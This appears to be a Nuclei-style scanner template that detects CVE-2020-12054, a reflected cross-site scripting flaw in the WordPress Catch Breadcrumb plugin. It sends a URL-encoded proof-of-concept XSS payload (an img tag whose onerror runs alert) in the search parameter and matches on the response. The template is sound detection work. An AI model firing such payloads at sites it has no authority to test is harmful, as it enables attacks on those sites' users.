id: CVE-2020-12054 info: name: WordPress Catch Breadcrumb <1.5.4 - Cross-Site Scripting author: daffainfo severity: medium description: | WordPress Catch Breadcrumb plugin before 1.5.4 contains a reflected cross-site scripting vulnerability via the s parameter (a search query). Also affected are 16 themes if the plugin is enabled: Alchemist and Alchemist PRO, Izabel and Izabel PRO, Chique and Chique PRO, Clean Enterprise and Clean Enterprise PRO, Bold Photography PRO, Intuitive PRO, Devotepress PRO, Clean Blocks PRO, Foodoholic PRO, Catch Mag PRO, Catch Wedding PRO, and Higher Education PRO. reference: - https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4 - https://wpvulndb.com/vulnerabilities/10184 - https://cxsecurity.com/issue/WLB-2020040144 - https://nvd.nist.gov/vuln/detail/CVE-2020-12054 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-12054 cwe-id: CWE-79 tags: wordpress,xss,wp-plugin,wpscan,cve,cve2020 requests: - method: GET path: - '{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E' matchers-condition: and matchers: - type: word words: - "" - "catch-breadcrumb" part: body condition: and - type: word part: header words: - text/html - type: status status: - 200 # Enhanced by mp on 2022/09/02